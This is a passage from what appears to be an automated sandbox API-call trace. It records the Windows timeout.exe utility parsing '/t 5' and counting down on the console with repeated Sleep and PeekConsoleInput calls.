"c:\\windows\\syswow64\\en-us\\timeout.exe.mui") Region: id = 1059 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 1060 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 1061 start_va = 0x4480000 end_va = 0x453ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 1062 start_va = 0x5e50000 end_va = 0x6186fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 32 os_tid = 0x13cc [0239.987] GetModuleHandleA (lpModuleName=0x0) returned 0xf0000 [0239.987] __set_app_type (_Type=0x1) [0239.987] __p__fmode () returned 0x75af4d6c [0239.988] __p__commode () returned 0x75af5b1c [0239.988] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf4fe0) returned 0x0 [0239.988] __wgetmainargs (in: _Argc=0xf6018, _Argv=0xf601c, _Env=0xf6020, _DoWildCard=0, _StartInfo=0xf602c | out: _Argc=0xf6018, _Argv=0xf601c, _Env=0xf6020) returned 0 [0239.988] SetThreadUILanguage (LangId=0x0) returned 0x409 [0240.065] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0240.065] SetLastError (dwErrCode=0x0) [0240.065] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0240.065] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0240.065] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0240.065] RtlVerifyVersionInfo (VersionInfo=0xdf7d8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c74e8 [0240.066] lstrlenW (lpString="") returned 0 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x2) returned 0x47c6c00 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c82b8 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c7500 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c70c8 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c72d8 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c2968 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c36f8 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c7518 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6e90 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6eb0 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c6ed0 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c8788 [0240.066] GetProcessHeap () returned 0x47c0000 [0240.066] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c73f8 [0240.067] GetProcessHeap () returned 0x47c0000 [0240.067] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc268 [0240.067] GetProcessHeap () returned 0x47c0000 [0240.067] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc348 [0240.067] GetProcessHeap () returned 0x47c0000 [0240.067] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc448 [0240.067] GetProcessHeap () returned 0x47c0000 [0240.067] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc228 [0240.067] SetThreadUILanguage (LangId=0x0) returned 0x409 [0240.141] SetLastError (dwErrCode=0x0) [0240.141] GetProcessHeap () returned 0x47c0000 [0240.141] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc428 [0240.141] GetProcessHeap () returned 0x47c0000 [0240.141] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc148 [0240.141] GetProcessHeap () returned 0x47c0000 [0240.141] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc168 [0240.141] GetProcessHeap () returned 0x47c0000 [0240.141] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc108 [0240.141] GetProcessHeap () returned 0x47c0000 [0240.141] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc0e8 [0240.141] GetProcessHeap () returned 0x47c0000 [0240.141] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c7380 [0240.141] _memicmp (_Buf1=0x47c7380, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.141] GetProcessHeap () returned 0x47c0000 [0240.141] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x208) returned 0x47cc4c8 [0240.141] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x47cc4c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\timeout.exe" (normalized: "c:\\windows\\syswow64\\timeout.exe")) returned 0x1f [0240.142] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\timeout.exe", lpdwHandle=0xdf8e4 | out: lpdwHandle=0xdf8e4) returned 0x76c [0240.142] GetProcessHeap () returned 0x47c0000 [0240.142] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x776) returned 0x47cc6d8 [0240.142] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\timeout.exe", dwHandle=0x0, dwLen=0x776, lpData=0x47cc6d8 | out: lpData=0x47cc6d8) returned 1 [0240.142] VerQueryValueW (in: pBlock=0x47cc6d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdf8ec, puLen=0xdf8f0 | out: lplpBuffer=0xdf8ec*=0x47cca88, puLen=0xdf8f0) returned 1 [0240.145] _memicmp (_Buf1=0x47c7380, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.146] _vsnwprintf (in: _Buffer=0x47cc4c8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdf8d0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0240.146] VerQueryValueW (in: pBlock=0x47cc6d8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdf8fc, puLen=0xdf8f8 | out: lplpBuffer=0xdf8fc*=0x47cc8bc, puLen=0xdf8f8) returned 1 [0240.146] lstrlenW (lpString="timeout.exe") returned 11 [0240.146] lstrlenW (lpString="timeout.exe") returned 11 [0240.146] lstrlenW (lpString=".EXE") returned 4 [0240.146] StrStrIW (lpFirst="timeout.exe", lpSrch=".EXE") returned=".exe" [0240.147] lstrlenW (lpString="timeout.exe") returned 11 [0240.147] lstrlenW (lpString=".EXE") returned 4 [0240.147] _memicmp (_Buf1=0x47c7380, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.147] lstrlenW (lpString="timeout") returned 7 [0240.147] GetProcessHeap () returned 0x47c0000 [0240.147] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc368 [0240.147] GetProcessHeap () returned 0x47c0000 [0240.147] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc128 [0240.147] GetProcessHeap () returned 0x47c0000 [0240.147] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc288 [0240.147] GetProcessHeap () returned 0x47c0000 [0240.147] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc3e8 [0240.147] GetProcessHeap () returned 0x47c0000 [0240.147] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47cd180 [0240.147] _memicmp (_Buf1=0x47cd180, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.148] GetProcessHeap () returned 0x47c0000 [0240.148] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xa0) returned 0x47cdb98 [0240.148] GetProcessHeap () returned 0x47c0000 [0240.148] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc488 [0240.148] GetProcessHeap () returned 0x47c0000 [0240.148] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc388 [0240.148] GetProcessHeap () returned 0x47c0000 [0240.148] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc248 [0240.148] GetProcessHeap () returned 0x47c0000 [0240.148] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47cd150 [0240.148] _memicmp (_Buf1=0x47cd150, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.148] GetProcessHeap () returned 0x47c0000 [0240.148] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x200) returned 0x47ce398 [0240.148] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x47ce398, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0240.148] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0240.148] GetProcessHeap () returned 0x47c0000 [0240.149] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x30) returned 0x47c83e0 [0240.149] _vsnwprintf (in: _Buffer=0x47cdb98, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdf8d4 | out: _Buffer="Type \"TIMEOUT /?\" for usage.") returned 28 [0240.149] GetProcessHeap () returned 0x47c0000 [0240.149] GetProcessHeap () returned 0x47c0000 [0240.149] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc6d8) returned 1 [0240.149] GetProcessHeap () returned 0x47c0000 [0240.149] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc6d8) returned 0x776 [0240.149] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc6d8 | out: hHeap=0x47c0000) returned 1 [0240.149] SetLastError (dwErrCode=0x0) [0240.149] GetThreadLocale () returned 0x409 [0240.149] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0240.149] lstrlenW (lpString="?") returned 1 [0240.149] GetThreadLocale () returned 0x409 [0240.149] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0240.149] GetThreadLocale () returned 0x409 [0240.149] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0240.149] lstrlenW (lpString="nobreak") returned 7 [0240.149] SetLastError (dwErrCode=0x0) [0240.149] SetLastError (dwErrCode=0x0) [0240.149] lstrlenW (lpString="/t") returned 2 [0240.149] lstrlenW (lpString="-/") returned 2 [0240.150] StrChrIW (lpStart="-/", wMatch=0x453002f) returned="/" [0240.150] lstrlenW (lpString="?") returned 1 [0240.150] lstrlenW (lpString="?") returned 1 [0240.150] GetProcessHeap () returned 0x47c0000 [0240.150] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47cd0f0 [0240.150] _memicmp (_Buf1=0x47cd0f0, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.150] GetProcessHeap () returned 0x47c0000 [0240.150] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xa) returned 0x47cd090 [0240.150] lstrlenW (lpString="t") returned 1 [0240.150] GetProcessHeap () returned 0x47c0000 [0240.150] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47cd1b0 [0240.150] _memicmp (_Buf1=0x47cd1b0, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.150] GetProcessHeap () returned 0x47c0000 [0240.150] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xa) returned 0x47cd1f8 [0240.150] _vsnwprintf (in: _Buffer=0x47cd090, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|?|") returned 3 [0240.150] _vsnwprintf (in: _Buffer=0x47cd1f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0240.150] lstrlenW (lpString="|?|") returned 3 [0240.150] lstrlenW (lpString="|t|") returned 3 [0240.150] StrStrIW (lpFirst="|?|", lpSrch="|t|") returned 0x0 [0240.150] SetLastError (dwErrCode=0x490) [0240.150] lstrlenW (lpString="t") returned 1 [0240.150] lstrlenW (lpString="t") returned 1 [0240.150] _memicmp (_Buf1=0x47cd0f0, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.150] lstrlenW (lpString="t") returned 1 [0240.150] _memicmp (_Buf1=0x47cd1b0, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.150] _vsnwprintf (in: _Buffer=0x47cd090, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0240.150] _vsnwprintf (in: _Buffer=0x47cd1f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0240.150] lstrlenW (lpString="|t|") returned 3 [0240.151] lstrlenW (lpString="|t|") returned 3 [0240.151] StrStrIW (lpFirst="|t|", lpSrch="|t|") returned="|t|" [0240.151] SetLastError (dwErrCode=0x0) [0240.151] SetLastError (dwErrCode=0x0) [0240.151] lstrlenW (lpString="5") returned 1 [0240.151] SetLastError (dwErrCode=0x490) [0240.151] SetLastError (dwErrCode=0x0) [0240.151] lstrlenW (lpString="5") returned 1 [0240.151] StrChrIW (lpStart="5", wMatch=0x3a) returned 0x0 [0240.151] SetLastError (dwErrCode=0x490) [0240.151] SetLastError (dwErrCode=0x0) [0240.151] GetProcessHeap () returned 0x47c0000 [0240.151] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47cd0a8 [0240.151] _memicmp (_Buf1=0x47cd0a8, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.151] lstrlenW (lpString="5") returned 1 [0240.151] GetProcessHeap () returned 0x47c0000 [0240.151] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x4) returned 0x47c87f0 [0240.151] lstrlenW (lpString="5") returned 1 [0240.151] lstrlenW (lpString=" \x09") returned 2 [0240.151] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0240.151] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0240.151] GetLastError () returned 0x0 [0240.151] lstrlenW (lpString="5") returned 1 [0240.151] lstrlenW (lpString="5") returned 1 [0240.151] SetLastError (dwErrCode=0x0) [0240.151] _errno () returned 0x45305b0 [0240.151] wcstol (in: _String="5", _EndPtr=0xdfab8, _Radix=10 | out: _EndPtr=0xdfab8*="") returned 5 [0240.152] lstrlenW (lpString="") returned 0 [0240.152] _errno () returned 0x45305b0 [0240.152] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b22 [0240.152] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0240.152] GetFileType (hFile=0x38) returned 0x2 [0240.152] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xdfab0 | out: lpMode=0xdfab0) returned 1 [0240.365] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0240.365] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xdfad0 | out: lpMode=0xdfad0) returned 1 [0240.482] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a1) returned 1 [0240.558] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x38, lpNumberOfEvents=0xdfad4 | out: lpNumberOfEvents=0xdfad4) returned 1 [0240.640] FlushConsoleInputBuffer (hConsoleInput=0x38) returned 1 [0240.718] GetProcessHeap () returned 0x47c0000 [0240.719] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc308 [0240.719] _memicmp (_Buf1=0x47cd150, _Buf2=0xf10ac, _Size=0x7) returned 0 [0240.719] LoadStringW (in: hInstance=0x0, uID=0x98, lpBuffer=0x47ce398, cchBufferMax=256 | out: lpBuffer="\nWaiting for %*lu") returned 0x11 [0240.719] lstrlenW (lpString="\nWaiting for %*lu") returned 17 [0240.719] GetProcessHeap () returned 0x47c0000 [0240.719] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x24) returned 0x47c3818 [0240.719] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="\nWaiting for %*lu", _ArgList=0xdfa9c | out: _Buffer="\nWaiting for 5") returned 14 [0240.719] __iob_func () returned 0x75af1208 [0240.719] _fileno (_File=0x75af1228) returned 1 [0240.719] _errno () returned 0x45305b0 [0240.719] _get_osfhandle (_FileHandle=1) returned 0x3c [0240.719] _errno () returned 0x45305b0 [0240.719] GetFileType (hFile=0x3c) returned 0x2 [0240.719] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0240.719] GetFileType (hFile=0x3c) returned 0x2 [0240.719] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0240.853] __iob_func () returned 0x75af1208 [0240.853] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0240.854] lstrlenW (lpString="\nWaiting for 5") returned 14 [0240.854] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0xe) returned 1 [0240.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0240.940] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0xdfae8 | out: lpConsoleScreenBufferInfo=0xdfae8) returned 1 [0241.030] GetProcessHeap () returned 0x47c0000 [0241.030] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47cc3c8 [0241.030] _memicmp (_Buf1=0x47cd150, _Buf2=0xf10ac, _Size=0x7) returned 0 [0241.031] LoadStringW (in: hInstance=0x0, uID=0xa0, lpBuffer=0x47ce398, cchBufferMax=256 | out: lpBuffer=" seconds, press a key to continue ...") returned 0x25 [0241.031] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37 [0241.031] GetProcessHeap () returned 0x47c0000 [0241.031] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x4c) returned 0x47c7948 [0241.031] __iob_func () returned 0x75af1208 [0241.031] _fileno (_File=0x75af1228) returned 1 [0241.031] _errno () returned 0x45305b0 [0241.031] _get_osfhandle (_FileHandle=1) returned 0x3c [0241.031] _errno () returned 0x45305b0 [0241.032] GetFileType (hFile=0x3c) returned 0x2 [0241.032] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0241.032] GetFileType (hFile=0x3c) returned 0x2 [0241.032] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0241.289] __iob_func () returned 0x75af1208 [0241.289] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0241.289] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37 [0241.289] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x47c7948*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0x47c7948*, lpNumberOfCharsWritten=0xdfa98*=0x25) returned 1 [0241.385] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0241.422] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b23 [0241.422] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x084") returned 2 [0241.422] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0241.511] __iob_func () returned 0x75af1208 [0241.511] _fileno (_File=0x75af1228) returned 1 [0241.511] _errno () returned 0x45305b0 [0241.511] _get_osfhandle (_FileHandle=1) returned 0x3c [0241.511] _errno () returned 0x45305b0 [0241.511] GetFileType (hFile=0x3c) returned 0x2 [0241.511] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0241.511] GetFileType (hFile=0x3c) returned 0x2 [0241.511] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0241.587] __iob_func () returned 0x75af1208 [0241.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0241.587] lstrlenW (lpString="\x084") returned 2 [0241.587] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0241.664] Sleep (dwMilliseconds=0x64) [0241.779] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0241.855] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b23 [0241.855] Sleep (dwMilliseconds=0x64) [0241.966] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0242.062] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b23 [0242.062] Sleep (dwMilliseconds=0x64) [0242.191] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0242.266] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b24 [0242.266] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x083") returned 2 [0242.267] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0242.342] __iob_func () returned 0x75af1208 [0242.342] _fileno (_File=0x75af1228) returned 1 [0242.342] _errno () returned 0x45305b0 [0242.342] _get_osfhandle (_FileHandle=1) returned 0x3c [0242.342] _errno () returned 0x45305b0 [0242.342] GetFileType (hFile=0x3c) returned 0x2 [0242.342] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0242.342] GetFileType (hFile=0x3c) returned 0x2 [0242.342] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0242.419] __iob_func () returned 0x75af1208 [0242.419] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0242.419] lstrlenW (lpString="\x083") returned 2 [0242.419] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0242.497] Sleep (dwMilliseconds=0x64) [0242.629] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0242.705] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b24 [0242.705] Sleep (dwMilliseconds=0x64) [0242.822] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0243.011] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b24 [0243.011] Sleep (dwMilliseconds=0x64) [0243.147] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0243.260] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b25 [0243.260] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x082") returned 2 [0243.260] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0243.338] __iob_func () returned 0x75af1208 [0243.338] _fileno (_File=0x75af1228) returned 1 [0243.338] _errno () returned 0x45305b0 [0243.338] _get_osfhandle (_FileHandle=1) returned 0x3c [0243.338] _errno () returned 0x45305b0 [0243.338] GetFileType (hFile=0x3c) returned 0x2 [0243.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0243.339] GetFileType (hFile=0x3c) returned 0x2 [0243.339] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0243.414] __iob_func () returned 0x75af1208 [0243.414] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0243.414] lstrlenW (lpString="\x082") returned 2 [0243.414] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0243.560] Sleep (dwMilliseconds=0x64) [0243.694] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0243.770] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b25 [0243.770] Sleep (dwMilliseconds=0x64) [0243.899] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0244.023] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b25 [0244.023] Sleep (dwMilliseconds=0x64) [0244.131] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0244.212] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b26 [0244.212] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x081") returned 2 [0244.212] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0244.326] __iob_func () returned 0x75af1208 [0244.326] _fileno (_File=0x75af1228) returned 1 [0244.326] _errno () returned 0x45305b0 [0244.326] _get_osfhandle (_FileHandle=1) returned 0x3c [0244.326] _errno () returned 0x45305b0 [0244.326] GetFileType (hFile=0x3c) returned 0x2 [0244.326] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0244.326] GetFileType (hFile=0x3c) returned 0x2 [0244.326] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0244.597] __iob_func () returned 0x75af1208 [0244.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0244.597] lstrlenW (lpString="\x081") returned 2 